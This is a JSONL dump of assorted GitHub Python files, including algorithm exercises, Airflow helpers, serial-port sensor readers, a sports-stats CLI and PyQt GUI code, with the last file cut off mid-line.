+{"seq_id":"34202133381","text":"class Solution:\n def sortArrayByParity(self, nums: List[int]) -> List[int]:\n b = []\n q = []\n for i in nums :\n if i%2 == 0 :\n b.append(i)\n else :\n q.append(i)\n\n return b+q\n \n # A.sort(key = lambda x : x%2) as even number remainder will be 0 and for odd it is 1 , so sort it .","repo_name":"pradyumnac26/Leetcode_Problems","sub_path":"905-sort-array-by-parity/905-sort-array-by-parity.py","file_name":"905-sort-array-by-parity.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"10671920596","text":"#####################################################################################\n#\n#\n# \tOperator Converter for Airflow Transformation\n# \n#\tAuthor: Sam Showalter\n#\tDate: October 3, 2018\n#\n#####################################################################################\n\n\n#####################################################################################\n# External Library and Module Imports\n#####################################################################################\n\n# System and OS\nimport os\nimport sys\n\n#Operator converter\nimport pandas as pd\n\n#Time \nfrom datetime import datetime, timedelta\n\n#String conversion for dictionaries\nimport json\nimport inspect\n\n#####################################################################################\n# Class and Constructor\n#####################################################################################\n\n\ndef evaluation_operation(params, dag, **kwargs):\n\n\tti = kwargs['ti']\n\n\tpreds = ti.xcom_pull(task_ids = params['model_id'])\n\ty_test = ti.xcom_pull(key = 'y_test')\n\n\treturn params['func'](y_test, preds, **params['params'])\n\ndef merge_metrics_operation(params, dag, **kwargs):\n\n\tti = kwargs['ti']\n\n\tmetrics_dict = {params['model']: {}}\n\n\tfor task_id in params['merge_ids']:\n\t\tmetric = ti.xcom_pull(task_ids = task_id)\n\t\tmetrics_dict[params['model']][task_id] = metric\n\t\t\n\treturn metrics_dict\n\ndef merge_data_operation(params, dag, **kwargs):\n\n\tti = kwargs['ti']\n\tdata = ti.xcom_pull(key = params['split'])\n\n\tpersist_cols = []\n\n\tfor task_id in params['merge_ids']:\n\t\ttask_data = ti.xcom_pull(task_ids = task_id, key = 'return_value')\n\n\t\tif isinstance(task_data, pd.DataFrame):\n\t\t\tpersist_cols += list(task_data.columns)\n\t\t\tdata = pd.concat([data, task_data], axis = 1)\n\t\telif isinstance(task_data, pd.Series):\n\n\t\t\tpersist_cols.append(task_data.name)\n\t\t\tdata[task_data.name] = task_data.values\n\n\t#Only persist mentioned\n\tdata = data.loc[:,persist_cols + params['pass_through_cols']]\n\n\tti.xcom_push(key = params['split'], value = data)\n\ndef bulk_data_operation(params, dag, **kwargs):\n\tti = kwargs['ti']\n\n\tdata = ti.xcom_pull(key = params['split'])\n\n\tif params['split'] == 'train':\n\t\tdata = params['func'](data, **params['params'])\n\t\tartifact = None\n\t\tif isinstance(data, tuple):\n\t\t\tartifact = data[1]\n\t\t\tdata = data[0]\n\t\t\t\n\t\t\n\t\tti.xcom_push(key = 'artifact', value = artifact)\n\t\tti.xcom_push(key = params['split'], value = data)\n\n\n\telif params['split'] == 'test':\n\t\ttrain_artifacts = ti.xcom_pull(key = 'artifact', \n\t\t\t\t\t\t\t\t\ttask_ids = kwargs['task']\\\n\t\t\t\t\t\t\t\t\t\t\t\t.task_id\\\n\t\t\t\t\t\t\t\t\t\t\t\t.replace('test','train'))\n\t\tif train_artifacts:\n\t\t\tti.xcom_push(key = params['split'],\n\t\t\t\t\t\t value = params['func'](data, \n\t\t\t\t\t\t\t\t\tprefit = train_artifacts, \n\t\t\t\t\t\t\t\t\t**params['params']))\n\t\telse:\n\t\t\tti.xcom_push(key = params['split'], \n\t\t\t\t\t\t\tvalue = params['func'](data,\n\t\t\t\t\t\t\t\t**params['params']))\n\n\telse:\n\t\traise ValueError(\"Invalid data source: {}. 
Check your inputs\".format(params['split']))\n\t\n\n\ndef col_data_operation(params, dag, **kwargs):\n\tti = kwargs['ti']\n\tdata = None\n\n\t#Get data based on inheritance or not\n\t#Data pulled in is either train or test slice\n\tif not params['inherits']:\n\t\tdata = ti.xcom_pull(key = params['split'])\n\t\tdata = data.loc[:, params['column_data_id']]\n\telse:\n\t\tdata = ti.xcom_pull(task_ids = params['column_data_id'], \n\t\t\t\t\t\t\t\t key = 'return_value') \n\n\tif params['split'] == 'train':\n\t\tres = params['func'](data, **params['params'])\n\t\tartifact = None\n\t\tif isinstance(res, tuple):\n\t\t\tartifact = res[1]\n\t\t\tres = res[0]\n\t\t\t\n\t\tti.xcom_push(key = 'artifact', value = artifact)\n\t\treturn res\n\n\telif params['split'] == 'test':\n\t\ttrain_artifacts = ti.xcom_pull(key = 'artifact', task_ids = kwargs['task']\\\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t.task_id\\\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t.replace('test','train'))\n\t\tif train_artifacts:\n\t\t\treturn params['func'](data, \n\t\t\t\t\t\t\t\t\tprefit = train_artifacts, \n\t\t\t\t\t\t\t\t\t**params['params'])\n\t\telse:\n\t\t\treturn params['func'](data, \n\t\t\t\t\t\t\t\t\t**params['params'])\n\n\telse:\n\t\traise ValueError(\"Invalid data source: {}. Check your inputs\".format(params['split']))\n\t\n\ndef fit_operation(params, dag, **kwargs):\n\t#if not _is_fitted(params['model']):\n\tti = kwargs['ti']\n\n\tX_train = ti.xcom_pull(key = \"X_train\")\n\ty_train = ti.xcom_pull(key = \"y_train\")\n\n\tmodel = params['model'](**params['params'])\n\tmodel.fit(X_train, y_train)\n\n\treturn model\n\ndef read_data_operation(params, dag, **kwargs):\n\n\tti = kwargs['ti']\n\n\tdata = params['func'](params['filepath'], **params['params'])\n\n\tti.xcom_push(key = 'data', value = data)\n\n\ndef predict_operation(params, dag, **kwargs):\n\tti = kwargs['ti']\n\n\tX_test = ti.xcom_pull(key = \"X_test\")\n\n\tmodel = ti.xcom_pull(task_ids = params['model'])\n\t\n\tpredictions = model.predict(X_test)\n\n\treturn predictions\n\n\ndef split_operation(params, dag, **kwargs):\n\n\tti = kwargs['ti']\n\n\tdata = ti.xcom_pull(key = 'data')\n\n\ttrain, test, target = params['func'](data, **params['params'])\n\n\tti.xcom_push(key = 'train', value = train)\n\tti.xcom_push(key = 'test', value = test)\n\tti.xcom_push(key = 'target', value = target)\n\tti.xcom_push(key = 'split_method', value = params['func'].__name__)\n\ndef model_split_operation(params, dag, **kwargs):\n\t\"\"\"\n\tsplits model based on target later\n\t\"\"\"\n\tti = kwargs['ti']\n\n\ttrain = ti.xcom_pull(key = 'train')\n\ttest = ti.xcom_pull(key = 'test')\n\ttarget = ti.xcom_pull(key = 'target')\n\n\tX_train = train.loc[:,train.columns != target]\n\ty_train = train.loc[:,target]\n\tX_test = test.loc[:,test.columns != target]\n\ty_test = test.loc[:,target]\n\n\tti.xcom_push(key = 'X_train', value = X_train)\n\tti.xcom_push(key = 'y_train', value = y_train)\n\tti.xcom_push(key = 'X_test', value = X_test)\n\tti.xcom_push(key = 'y_test', value = y_test)\n\ndef k_fold_operation(func, params, dag, **kwargs):\n\tpass\n\ndef void_operation(func, params, dag, **kwargs):\n\n\treturn func(data, **params)","repo_name":"SamShowalter/airbender","sub_path":"airbender/airflow/op_converter.py","file_name":"op_converter.py","file_ext":"py","file_size_in_byte":5798,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"70"}
+{"seq_id":"4701035035","text":"# -*- coding: utf-8 -*-\n\"\"\"\n判断一个有向图是否存在环\n有一个有向图,每个元素代表一个边,元素的第一个值为父节点,第二个值为子节点\n如果任意一个节点往子节点走下去又能回到当前节点则存在环,实现函数,判断是否存在环。\n[{A,B}, {B,C}, {A,C}] 无环\n[{A,B}, {B,C}, {A,C}, {C, A}] 有环\n\"\"\"\nimport re\n\n\ndef transform(input):\n _input = input.upper()\n _input = re.sub(\"[^A-Z]\", \"\", _input)\n _result = []\n for i in range(0, len(_input), 2):\n f = _input[i]\n s = _input[i + 1]\n _result.append((f, s))\n return _result\n\n\ndef dsf(input, current, loop):\n if loop[-1][1] == current[0]:\n loop.append(current)\n # 有环,则返回成功标致\n if loop[-1][1] == loop[0][0]:\n return True\n\n if len(input) == 0 and len(loop) > 1:\n loop.pop()\n\n for j, single in enumerate(input):\n res = dsf(input[j + 1:] + input[:j], single, loop)\n # 这里很关键,需要把后面的递归结果传到前面\n if res:\n return True\n # 如果递归结束,还没有检测到,则返回False\n return False\n\n\ndef detect(input):\n _input = transform(input)\n result = []\n # 每个元素都使用‘深度优先搜索’检测是否存在环,并记录结果\n for i, single in enumerate(_input):\n loop = [single]\n input_single = _input[:i] + _input[i+1:]\n result.append(dsf(input_single, single, loop))\n # '''\n # DEGUB\n for j, res in enumerate(result):\n # 查看具体哪个元素不能找到环\n if res is False:\n print(_input[j])\n # '''\n # 有一个元素不存在环,则整个图不存在环\n if False in result:\n return False\n else:\n return True\n\n\nif __name__ == \"__main__\":\n # example = input()\n example = '[{A,B},{B,C},{c,a},{d,a},{a,C},{C,B}]'\n result = detect(example)\n","repo_name":"seven-linglx/algorithm","sub_path":"circle.py","file_name":"circle.py","file_ext":"py","file_size_in_byte":1950,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"72284682465","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 6 03:01:23 2020\n\n@author: anunay.aatipamula\n\"\"\"\n\nclass Node:\n def __init__(self, value):\n self.value = value\n self.next = None\n\n def __repr__(self):\n return str(self.value)\n\n\nclass LinkedList:\n def __init__(self):\n self.head = None\n\n def __str__(self):\n cur_head = self.head\n out_string = \"\"\n while cur_head:\n out_string += str(cur_head.value) + \" -> \"\n cur_head = cur_head.next\n return out_string\n\n\n def append(self, value):\n\n if self.head is None:\n self.head = Node(value)\n return\n\n node = self.head\n while node.next:\n node = node.next\n\n node.next = Node(value)\n \n def to_list(self):\n node = self.head\n ll = list()\n while node is not None:\n ll.append(node.value)\n node = node.next\n return ll\n \n\n def size(self):\n size = 0\n node = self.head\n while node:\n size += 1\n node = node.next\n\n return size\n\ndef union(llist_1, llist_2):\n # Your Solution Here\n union = LinkedList()\n set1 = set(llist_1.to_list())\n set2 = set(llist_2.to_list())\n set_union = list(set1.union(set2))\n for value in set_union:\n union.append(value)\n return union\n\ndef intersection(llist_1, llist_2):\n # Your Solution Here\n intersection = LinkedList()\n set1 = set(llist_1.to_list())\n set2 = set(llist_2.to_list())\n set_intersection = list(set1.intersection(set2))\n for value in set_intersection:\n intersection.append(value)\n \n return intersection\n\n\n# Test case 1\nlinked_list_1 = LinkedList()\nlinked_list_2 = LinkedList()\n\nelement_1 = [3, 2, 4, 35, 6, 65, 6, 4, 3, 21]\nelement_2 = [6, 32, 4, 9, 6, 1, 11, 21, 1]\n\nfor i in element_1:\n linked_list_1.append(i)\n\nfor i in element_2:\n linked_list_2.append(i)\n\nprint(union(linked_list_1, linked_list_2))\n# 32 -> 65 -> 2 -> 35 -> 3 -> 4 -> 6 -> 1 -> 9 -> 11 -> 21 ->\nprint(intersection(linked_list_1, linked_list_2))\n# 4 -> 21 -> 6 ->\n\n# Test case 2\nlinked_list_3 = LinkedList()\nlinked_list_4 = LinkedList()\n\nelement_1 = [3, 2, 4, 35, 6, 65, 6, 4, 3, 23]\nelement_2 = [1, 7, 8, 9, 11, 21, 1]\n\nfor i in element_1:\n linked_list_3.append(i)\n\nfor i in element_2:\n linked_list_4.append(i)\n\nprint(union(linked_list_3, linked_list_4))\n# 65 -> 2 -> 35 -> 3 -> 4 -> 6 -> 1 -> 7 -> 8 -> 9 -> 11 -> 21 -> 23 ->\nprint(intersection(linked_list_3, linked_list_4))\n#\n\n# Test case 3\nlinked_list_5 = LinkedList()\nlinked_list_6 = LinkedList()\n\nelement_1 = [22, 7, 4, 35, 6, 65, 6, 4, 3, 23]\nelement_2 = [1, 7, 8, 65, 11, 21, 1]\n\nfor i in element_1:\n linked_list_5.append(i)\n\nfor i in element_2:\n linked_list_6.append(i)\n\nprint(union(linked_list_5, linked_list_6))\n# 65 -> 1 -> 35 -> 4 -> 3 -> 6 -> 7 -> 8 -> 11 -> 21 -> 22 -> 23 ->\nprint(intersection(linked_list_5, linked_list_6))\n# 65 -> 7 ->\n\n\n# Edge Cases:\n# Test case 4\nlinked_list_7 = LinkedList()\nlinked_list_8 = LinkedList()\n\nelement_1 = []\nelement_2 = [1, 7, 8]\n\nfor i in element_1:\n linked_list_7.append(i)\n\nfor i in element_2:\n linked_list_8.append(i)\n\nprint(union(linked_list_7, linked_list_8))\n# 8 -> 1 -> 7 ->\nprint(intersection(linked_list_7, linked_list_8))\n#\n\n# Test case 5\nlinked_list_9 = LinkedList()\nlinked_list_10 = LinkedList()\n\nelement_1 = []\nelement_2 = []\n\nfor i in element_1:\n linked_list_9.append(i)\n\nfor i in element_2:\n linked_list_10.append(i)\n\nprint(union(linked_list_9, linked_list_10))\n#\nprint(intersection(linked_list_9, linked_list_10))\n#\n","repo_name":"anunay999/udacity-nd","sub_path":"Data 
Structures - ND/Show me the Data Structure/union_intersection.py","file_name":"union_intersection.py","file_ext":"py","file_size_in_byte":3647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"73060011426","text":"import random\n\nfrom piwall2.broadcaster.ffprober import Ffprober\nfrom piwall2.config import Config\nfrom piwall2.configloader import ConfigLoader\nfrom piwall2.directoryutils import DirectoryUtils\nfrom piwall2.logger import Logger\n\nclass ScreensaverHelper:\n\n __is_loaded = False\n __screensavers = None\n\n def __init__(self):\n self.__logger = Logger().set_namespace(self.__class__.__name__)\n self.__load_config_if_not_loaded()\n\n def choose_random_screensaver(self):\n if len(ScreensaverHelper.__screensavers) <= 0:\n return None\n return random.choice(ScreensaverHelper.__screensavers)\n\n def __load_config_if_not_loaded(self):\n if ScreensaverHelper.__is_loaded:\n return\n\n self.__logger.info(\"Loading screensaver metadata...\")\n screensaver_config = Config.get('screensavers', [])\n ffprober = Ffprober()\n ScreensaverHelper.__screensavers = []\n path_prefix = DirectoryUtils().root_dir + '/assets/screensavers/'\n for screensaver_metadata in screensaver_config:\n video_path = path_prefix + screensaver_metadata['video_file']\n ffprobe_metadata = ffprober.get_video_metadata(video_path, ['height'])\n height = int(ffprobe_metadata['height'])\n if ConfigLoader().is_any_receiver_dual_video_output() and height > 720:\n self.__logger.warning(f'Not adding video [{video_path}] to screensavers because its resolution ' +\n f'was too high for a dual output receiver ({height} is greater than 720p).')\n continue\n ScreensaverHelper.__screensavers.append({\n 'video_path': video_path,\n 'height': height,\n })\n self.__logger.info(\"Done loading screensaver metadata.\")\n","repo_name":"dasl-/piwall2","sub_path":"piwall2/broadcaster/screensaverhelper.py","file_name":"screensaverhelper.py","file_ext":"py","file_size_in_byte":1805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"9649317096","text":"class ShoppingList:\n\n list = []\n\n def add(self, product):\n self.list.append(product)\n\n def remove(self, product_index):\n self.list.pop(product_index - 1)\n\n def length(self):\n return len(self.list)\n\n def items(self):\n return self.list\n\n def __str__(self):\n return f\"\"\"Ostoslistasi sisältää seuraavat tuotteet:\n{self.list}\nVoit valita alla olevista toiminnoista:\n1) Lisää\n2) Poista\n0) Lopeta\"\"\"\n\n\ndef main():\n ostoslista = ShoppingList()\n\n while True:\n print(ostoslista)\n decision = int(input(\"Valintasi: \"))\n\n if decision == 1:\n new_product = input(\"Anna lisättävä tuote: \")\n print()\n ostoslista.add(new_product)\n elif decision == 2:\n print(f\"Ostoslistassasi on {ostoslista.length()} tuotetta.\")\n remove_number = int(input(\"Anna poistettavan tuotteen järjestysnumero: \"))\n print()\n ostoslista.remove(remove_number)\n elif decision == 0:\n print(f\"Sinulta jäi ostamatta seuraavat tuotteet:\\n{ostoslista.items()}\")\n break\n else:\n print(\"Tunnistamaton valinta.\\n\")\n\n print(\"Kiitos ohjelman käytöstä.\")\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Al1babax/Practices","sub_path":"Homework/Al1baba/LUT homework/Johdatus/L07-T1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"fi","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"15096125782","text":"import serial.tools.list_ports\nimport json\nimport struct\nimport math\nimport time\nimport random\nimport threading\n\n\nfrom open_gateway.sources.base import (\n BaseReader,\n BaseResultReaderMixin,\n BaseStreamReaderMixin,\n)\n\nBAUD_RATE = 460800\n\n\nclass SerialReader(BaseReader):\n name = \"SERIAL\"\n\n def __init__(self, config, device_id, **kwargs):\n\n super(SerialReader, self).__init__(config, device_id, **kwargs)\n self._port = device_id\n self._baud_rate = config.get(\"BAUD_RATE\", BAUD_RATE)\n print(\"BAUD rate set to\", self._baud_rate)\n\n @property\n def port(self):\n return self._port\n\n @property\n def baud_rate(self):\n return self._baud_rate\n\n def _write(self, command):\n with serial.Serial(self.port, self.baud_rate, timeout=1) as ser:\n ser.write(str.encode(command))\n\n def _read_line(self, flush_buffer=False):\n with serial.Serial(self.port, self.baud_rate, timeout=1) as ser:\n\n value = ser.readline()\n if flush_buffer:\n value = ser.readline()\n try:\n return value.decode(\"ascii\")\n except:\n return None\n\n def _read_serial_buffer(self, buffer_size):\n with serial.Serial(self.port, self.baud_rate, timeout=1) as ser:\n return ser.read(buffer_size)\n\n def _flush_buffer(self):\n with serial.Serial(self.port, self.baud_rate, timeout=1) as ser:\n return ser.reset_input_buffer()\n\n def get_port_info(self):\n ports = serial.tools.list_ports.comports()\n\n port_list = []\n for index, (port, desc, hwid) in enumerate(sorted(ports)):\n port_list.append({\"id\": index, \"name\": desc, \"device_id\": port})\n\n return port_list\n\n def list_available_devices(self):\n return self.get_port_info()\n\n\nclass SerialStreamReader(SerialReader, BaseStreamReaderMixin):\n def _send_subscribe(self):\n self._write(\"connect\")\n\n def read_device_config(self):\n\n try:\n config = json.loads(self._read_line(flush_buffer=True))\n except:\n self._write(\"disconnect\")\n time.sleep(1.0)\n config = json.loads(self._read_line(flush_buffer=True))\n\n if self._validate_config(config):\n return config\n\n raise Exception(\"Invalid Configuration File\")\n\n def _read_source(self):\n\n try:\n print(\"Serial: Reading source stream\")\n with serial.Serial(self.port, self.baud_rate, timeout=1) as ser:\n\n self.streaming = True\n ser.reset_input_buffer()\n ser.read(self.source_buffer_size)\n\n if self.run_sml_model:\n sml = self.get_sml_model_obj()\n else:\n sml = None\n\n while self.streaming:\n\n data = ser.read(self.source_buffer_size)\n\n self.buffer.update_buffer(data)\n\n if self.run_sml_model:\n model_result = self.execute_run_sml_model(sml, data)\n if model_result:\n self.rbuffer.update_buffer([model_result]) \n\n time.sleep(0.00001)\n\n print(\"Serial: Sending disconnect command\")\n ser.write(str.encode(\"disconnect\"))\n\n except Exception as e:\n print(e)\n self.disconnect()\n raise e\n\n\nclass SerialResultReader(SerialReader, BaseResultReaderMixin):\n def set_app_config(self, config):\n config[\"DATA_SOURCE\"] = self.name\n config[\"DEVICE_ID\"] = self.port\n\n def _read_source(self):\n\n self._flush_buffer()\n\n self.streaming = True\n with serial.Serial(self.port, self.baud_rate, timeout=1) as ser:\n while self.streaming:\n \n try:\n value = ser.readline() \n data = [value.decode(\"ascii\")]\n \n except Exception as e:\n print(e,)\n print(\"value\", value)\n continue\n\n \n if \"ModelNumber\" in data[0]:\n self.rbuffer.update_buffer(data)\n elif data[0]:\n print(data[0].rstrip())\n\n\nif __name__ == \"__main__\":\n port = \"/dev/ttyACM0\"\n 
buffer_size = 6 * 10\n config={'DATA_SOURCE':'RESULTS', \"DEVICE_ID\":\"COM4\"}\n sr = SerialResultReader(config, \"COM4\")\n sr.connect()\n sr._read_source()","repo_name":"sensiml/open-gateway","sub_path":"open_gateway/sources/serial.py","file_name":"serial.py","file_ext":"py","file_size_in_byte":4575,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"70"}
+{"seq_id":"41635332216","text":"#!/usr/bin/env python3\n\nimport click\n\nfrom grabstats.schedule import get_schedule\nfrom grabstats.box_score import box_scores_get_many, to_csv\n\n\n@click.command()\n@click.option(\n '-b',\n '--basic',\n 'basic_box_score_file',\n type=click.Path(),\n default='basic_box_score.csv',\n help='CSV file to write basic box score',\n)\n@click.option(\n '-a',\n '--adv',\n 'adv_box_score_file',\n type=click.Path(),\n default='adv_box_score.csv',\n help='CSV file to write advanced box score',\n)\n@click.option(\n '-dk',\n '--draftkings',\n 'calc_dk',\n is_flag=True,\n help='Calculate DraftKings fantasy points'\n)\n@click.option(\n '-fd',\n '--fanduel',\n 'calc_fd',\n is_flag=True,\n help='Calculate FanDuel fantasy points'\n)\n@click.argument(\n 'date',\n type=click.DateTime(formats=['%Y-%m-%d', '%Y-%m'])\n)\ndef main(date, basic_box_score_file, adv_box_score_file, calc_dk, calc_fd):\n print(date)\n year = '2019'\n month = '05'\n day = '03'\n schedule = get_schedule(year, month, day)\n basic_box_scores, adv_box_scores = box_scores_get_many(schedule)\n\n for box_score in basic_box_scores:\n to_csv(box_score, basic_box_score_file)\n\n for box_score in adv_box_scores:\n to_csv(box_score, adv_box_score_file)\n\n\nif __name__ == '__main__':\n main()","repo_name":"kndo/grabstats","sub_path":"grabstats/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"22441542081","text":"import os\n\nfrom ase_parse import parse\n\n\ntheme_path = os.path.join(os.path.dirname(__file__), \"themes/\")\n\nfor theme_file in os.listdir(theme_path):\n fp = os.path.join(theme_path, theme_file)\n print(\"Parsing %s\" % theme_file)\n f = parse(fp)\n if not f:\n raise ValueError\n print(\" %s\" % f.data.palette.title)\n for color in f.data.palette.colors:\n print(\" (%s)\" % \", \".join([\"%.04f\" % f for f in color.color_values]))\n","repo_name":"Ahuge/ase_parser","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"40797426803","text":"#!/usr/bin/env python\n\n#from __future__ import print_function\nfrom util import TemporaryDirectory\nfrom plumbum import local, FG, cli\nfrom plumbum.cmd import git, rm, chmod\nimport logging\nfrom util import logfmt\nimport sys\n\nlogger = logging.getLogger()\nlogging.basicConfig(level=logging.DEBUG, format=logfmt(__file__))\n\nclass App(cli.Application):\n DESCRIPTION = \"Makes a read-only version of tract_querier with a \\\nparticular commit. Output is 'tract_querier-'.\"\n\n prefix = cli.SwitchAttr('-d', cli.ExistingDirectory, help=\"Root directory in which to install repo\", default=local.path('/data/pnl/soft'))\n githash = cli.SwitchAttr('-g', help='GitHub hash commit. If omitted will get latest commit from the master branch.')\n\n def main(self):\n repo = 'https://github.com/demianw/tract_querier.git'\n with TemporaryDirectory() as tmpdir:\n clone = local.path(tmpdir) / \"tract_querier\"\n if not self.githash:\n git(\"clone\", \"--depth\", \"1\", repo, clone)\n else:\n git(\"clone\", repo, clone)\n clone_hash = git(\"rev-parse\", \"--short\", \"HEAD\")[:-1] # remove trailing \\n\n # save 70M of space\n rm('-r', clone / 'doc')\n rm('-r', clone / '.git')\n out = self.prefix / \"tract_querier-\"+clone_hash\n clone.move(out)\n chmod('-R', 'a-w', out)\n\nif __name__ == '__main__':\n App.run()\n","repo_name":"reckbo/ppl","sub_path":"scripts/maketractquerier.py","file_name":"maketractquerier.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"21174893628","text":"import getRequestDetail\nfrom Framework.storeJSONData import store_jsondata\n\n\ndef view_request(req_id):\n details = getRequestDetail.getRequestDetail().getRequest(req_id)\n if details == \"No Request\":\n response = \"Your request does not exist in Database. Please give a valid id!!\"\n elif details == None:\n response = \"Sorry! service desk server is not able to authenticate you.\"\n else:\n # status = details['requestInfo']['status']\n response = \"Thank you for giving request_id. What information do you want for your request?\"\n # print(\"************************\" + str(details))\n store_jsondata(details)\n return response\n\n\n\n","repo_name":"PawanKGupta/facebook-chatbot","sub_path":"viewRequest.py","file_name":"viewRequest.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"22651789708","text":"import sys\nfrom PyQt5 import QtWidgets\nfrom PyQt5.QtWidgets import QApplication, QMainWindow\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import * \nclass popup1(QDialog):\n def __init__(self,index=None,tabwidget=None):\n super().__init__()\n self.title = \"App\"\n self.index=index\n self.tabwidget=tabwidget\n self.text=\"\"\n #self.tablefirsttime=0\n self.InitUI()\n def InitUI(self):\n #a=QFrame()\n #print(\"start\")\n screen = app.primaryScreen()\n size = screen.size()\n # MainWindow.resize(size.width()*80/100, size.height()*80/100)\n self.resize(int(size.width()*25/100),int(size.height()*18/100))\n self.setWindowModality(Qt.ApplicationModal)\n self.setWindowFlags(Qt.WindowStaysOnTopHint)\n self.setStyleSheet('background-color:white;')\n # self._gif =QLabel(self)\n # self._gif.move(215,30)\n # self._gif.setStyleSheet('background-color:white;border:0px solid white')\n # movie = QMovie(\"as4.gif\")\n # self._gif.setMovie(movie)\n # movie.setSpeed(500)\n # movie.start()\n label1 = QLabel('Rename',self)\n label1.setFont(QFont('Arialbold', 20))\n label1.setStyleSheet('background-color:white;border:0px solid white')\n hbox = QHBoxLayout()\n hbox.addStretch(1)\n hbox.addWidget(label1)\n hbox.addStretch(1)\n \n label2 = QLabel(\"Are you sure you want to rename the tab ?\",self)\n label2.setFont(QFont('Arial', 12))\n label2.setStyleSheet('background-color:white;border:0px solid white')\n hbox2 = QHBoxLayout()\n hbox2.addStretch(1)\n hbox2.addWidget(label2)\n hbox2.addStretch(1)\n \n label3 = QLabel(\"Name of tab:\",self)\n label3.setFont(QFont('Arial', 12))\n label3.setStyleSheet('background-color:white;border:0px solid white')\n self.plainTextEdit = QtWidgets.QLineEdit(self)\n self.plainTextEdit.textChanged.connect(self.textchanged)\n # self.plainTextEdit.setFixedSize(200, 20)\n \n hbox3 = QHBoxLayout()\n hbox3.addStretch(1)\n hbox3.addWidget(label3)\n hbox3.addWidget(self.plainTextEdit)\n hbox3.addStretch(1)\n\n okButton = QPushButton(\"Yes\")\n okButton.setFixedSize(150, 50)\n okButton.setFont(QFont('Arial', 12))\n okButton.setStyleSheet('background-color:#103F91;color:white')\n okButton.clicked.connect(self.call_yes)\n cancelButton = QPushButton(\"No\")\n cancelButton.setFixedSize(150, 50)\n cancelButton.setFont(QFont('Arial', 12))\n cancelButton.setStyleSheet('background-color:#F22323;color:white')\n cancelButton.clicked.connect(self.call_no)\n \n hbox4 = QHBoxLayout()\n hbox4.addStretch(1)\n hbox4.addWidget(okButton)\n hbox4.addWidget(cancelButton)\n \n vbox = QVBoxLayout()\n # vbox.addStretch(1)\n vbox.addLayout(hbox)\n # vbox.addStretch(0.1)\n vbox.addLayout(hbox2)\n vbox.addStretch(1)\n vbox.addLayout(hbox3)\n vbox.addStretch(1)\n vbox.addLayout(hbox4)\n self.setLayout(vbox)\n # self.vbox=QVBoxLayout(self)\n # self.vbox.setAlignment(Qt.AlignCenter)\n # # self.vbox.addWidget(self.label)\n # self.setLayout(self.vbox)\n # self.hbox = QHBoxLayout(self)\n\n # label1.move(236,130)\n\n # label2.move(50,170)\n # self.vbox.addWidget(label1)\n # self.vbox.addStretch(1)\n # self.vbox.addWidget(label2)\n # self.plainTextEdit = QtWidgets.QLineEdit(self)\n # self.plainTextEdit.textChanged.connect(self.textchanged)\n # yes = QPushButton(\"no\", self)\n # yes.setGeometry(155,240,240,80)\n # yes.setFont(QFont('Arial', 21))\n # yes.setStyleSheet('background-color:#4299ff; color: white')\n # yes.clicked.connect(self.call_yes)\n # no = QPushButton(\"no\", self)\n # no.setGeometry(155,240,240,80)\n # no.setFont(QFont('Arial', 21))\n # 
no.setStyleSheet('background-color:#4299ff; color: white')\n # no.clicked.connect(self.call_no)\n #self.show()\n #a.show()\n def textchanged(self,text):\n print(text)\n # print \"contents of text box: \"+text\n self.text=text\n\n def call_yes(self):\n self.tabwidget.setTabText(self.index,self.text)\n self.close()\n\n def call_no(self):\n self.close()\n # self.tabwidget.setTabText(self.index,self.text)\n # self.close()\n #self.destroy()\n #gc.collect() \n\nclass TabExample(QMainWindow):\n def __init__(self):\n super(TabExample, self).__init__()\n self.setWindowTitle(\"Tab example\")\n\n # Create widgets\n self.tab_widget = QtWidgets.QTabWidget()\n self.setCentralWidget(self.tab_widget)\n\n # Label's to fill widget\n self.label1 = QtWidgets.QLabel(\"Tab 1\")\n self.label2 = QtWidgets.QLabel(\"Tab 2\")\n\n # Adding tab's\n self.tab_widget.addTab(self.label1, \"Tab 1\")\n self.tab_widget.addTab(self.label2, \"Tab 2\")\n self.tab_widget.setTabsClosable(True)\n self.tab_widget.tabCloseRequested.connect(lambda index: self.demofunction(index)) \n self.tab_widget.tabBarDoubleClicked.connect(lambda index: self.rename_tab(index))\n\n # Tab button's\n # self.right = self.tab_widget.tabBar().LeftSide\n # self.tab_widget.tabBar().setTabButton(0, self.right, TabButtonWidget())\n # self.tab_widget.tabBar().setTabButton(1, self.right, TabButtonWidget())\n\n # Tab settings\n self.tab_widget.tabBar().setMovable(True)\n\n self.show()\n\n def rename_tab(self,index):\n self.x=popup1(index,self.tab_widget)\n self.x.show()\n print(\"pass\",index)\n\n def demofunction(self,index):\n self.tab_widget.removeTab(index);\n # delete tabWidget_->widget(index);\n # self.tab_widget.setTabText(index,\"faisal\")\n print(\"pass\",index) \n # self.show() \n\nclass TabButtonWidget(QtWidgets.QWidget):\n def __init__(self):\n super(TabButtonWidget, self).__init__()\n # Create 